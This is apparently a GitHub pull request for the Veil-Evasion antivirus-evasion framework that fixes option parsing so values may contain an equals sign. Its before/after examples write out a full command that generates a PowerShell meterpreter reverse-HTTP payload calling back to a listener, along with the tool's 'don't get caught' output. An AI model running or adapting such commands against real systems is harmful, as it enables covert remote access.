### PR TITLE
Allow Equals Sign in Options

### DIFF
--- a/Veil-Evasion.py
+++ b/Veil-Evasion.py
@@ -350,7 +350,7 @@ if __name__ == '__main__':
         if args.c:
             options['required_options'] = {}
             for option in args.c:
-                name,value = option.split("=")
+                name,value = option.split("=",1)
                 options['required_options'][name.upper()] = [value, ""]
 
         # pull out any msfvenom shellcode specification and msfvenom options


### PR DESCRIPTION
Split only on the first equals sign otherwise options cannot have '=' in their values. Check out the following example with the USER_AGENT set. 

### Before
```
/opt/Veil-Evasion/Veil-Evasion.py -p powershell/meterpreter/rev_http -c LHOST=192.168.56.101  LPORT=80  USER_AGENT="Mozilla=foo" --overwrite -o veil_reverse_http
[...]
=========================================================================
 Veil-Evasion | [Version]: 2.26.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

Traceback (most recent call last):
  File "/opt/Veil-Evasion/Veil-Evasion.py", line 353, in <module>
    name,value = option.split("=")
ValueError: too many values to unpack
```

### After
```
/opt/Veil-Evasion/Veil-Evasion.py -p powershell/meterpreter/rev_http -c LHOST=192.168.56.101  LPORT=80  USER_AGENT="Mozilla=foo" --overwrite -o veil_reverse_http
[...]
=========================================================================
 Veil-Evasion | [Version]: 2.26.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: powershell/meterpreter/rev_http


 Language:		powershell
 Payload:		powershell/meterpreter/rev_http
 Required Options:      LHOST=192.168.56.101  LPORT=80  LURI=/  PROXY=N
                        STAGERURILENGTH=4  USER_AGENT=Mozilla=foo
 Payload File:		/usr/share/veil-output/source/veil_reverse_http.bat
 Handler File:		/usr/share/veil-output/handlers/veil_reverse_http_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)
```

This also might need to be changed in the RPC server implementation ([L185](https://github.com/sammbertram/Veil-Evasion/blob/master/Veil-Evasion.py#L185)).